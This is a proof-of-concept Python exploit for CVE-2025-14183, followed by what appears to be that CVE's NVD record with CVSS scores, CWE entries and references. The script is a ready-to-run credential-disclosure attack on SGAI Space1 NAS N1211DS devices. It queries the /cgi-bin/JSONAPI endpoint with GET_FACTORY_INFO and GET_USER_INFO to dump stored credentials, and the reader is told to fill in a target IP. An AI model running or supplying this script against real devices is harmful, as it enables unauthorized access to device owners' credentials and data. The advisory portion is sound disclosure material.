CVE-2025-14183

import requests # CVE-2025-14183 PoC - SGAI Space1 NAS Credential Disclosure # Target: SGAI Space1 NAS N1211DS # Vulnerability: Unprotected storage of credentials in /cgi-bin/JSONAPI target_ip = "192.168.1.100" # Replace with target IP target_port = 80 def exploit_credential_disclosure(): """Exploit CVE-2025-14183 to retrieve credentials""" # Get Factory Info factory_url = f"http://{target_ip}:{target_port}/cgi-bin/JSONAPI" factory_params = { "function": "GET_FACTORY_INFO" } # Get User Info user_params = { "function": "GET_USER_INFO" } print("[*] Exploiting CVE-2025-14183...") print(f"[*] Target: {target_ip}:{target_port}") try: # Request factory information print("[*] Requesting factory information...") factory_response = requests.get(factory_url, params=factory_params, timeout=10) print(f"[+] Factory Info Response: {factory_response.text}") # Request user information print("[*] Requesting user information...") user_response = requests.get(factory_url, params=user_params, timeout=10) print(f"[+] User Info Response: {user_response.text}") return factory_response.json(), user_response.json() except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None, None if __name__ == "__main__": exploit_credential_disclosure()

{"cve": {"id": "CVE-2025-14183", "sourceIdentifier": "[email protected]", "published": "2025-12-07T03:15:59.890", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in SGAI Space1 NAS N1211DS up to 1.0.915. This issue affects the function GET_FACTORY_INFO/GET_USER_INFO of the file /cgi-bin/JSONAPI of the component gsaiagent. The manipulation results in unprotected storage of credentials. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334603", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334603", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698566", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698567", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a8000b30bd543247fa1bd", "source": "[email protected]"}, {"url": "https://www.notion.so/2b16cf4e528a80859264db63f2340d7a", "source": "[email protected]"}]}}